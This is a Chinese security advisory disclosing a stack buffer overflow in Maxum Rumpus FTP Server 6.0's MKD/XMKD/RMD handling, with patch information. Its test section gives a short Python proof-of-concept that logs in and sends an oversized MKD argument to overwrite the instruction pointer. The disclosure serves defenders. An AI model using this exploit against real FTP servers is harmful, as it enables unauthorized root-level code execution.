发布日期：2008-12-01
更新日期：2008-12-02

受影响系统：

Maxum Rumpus FTP Server 6.0

不受影响系统：

Maxum Rumpus FTP Server 6.0.1

描述：

---

BUGTRAQ  ID: 32558

Rumpus FTP Server是适用于Mac平台的Internet文件传输解决方案。

Rumpus FTP Server的FTP组件在解析FTP命令的MKD、XMKD、RMD等参数时存在缓冲区溢出漏洞。在将参数strcpy到内部缓冲区时，目标缓冲区为1024字节。当输入参数大于1046字节时，就会覆盖指令指针，导致以超级用户（root）权限执行任意代码。尽管必须授权才可以利用这个漏洞，但FTP守护程序可能允许匿名访问。

<*来源：Nam Nguyen （namn@bluemoon.com.vn）
  
  链接：http://marc.info/?l=bugtraq&m=122815870631607&w=2
        http://www.maxum.com/Rumpus/Overview.html
        http://secunia.com/advisories/32892/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

from socket import socket, AF_INET, SOCK_STREAM
  
  host = "192.168.1.12"
  port = 21
  user = "regular"
  pass_ = "training"
  
  commands = [
      'user regular\n',
      'pass training\n',
      'mkd ' + 'z' * 1046 + 'abcd\n'
  ]
  
  s = socket(AF_INET, SOCK_STREAM)
  s.connect((host, port))
  s.recv(1024)
  for line in commands:
      s.send(line)
      s.recv(1024)
  s.close()

建议：

---

厂商补丁：

Maxum
-----
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.maxum.com/Rumpus/DownloadADemo.html

浏览次数：3408
严重程度：0（网友投票）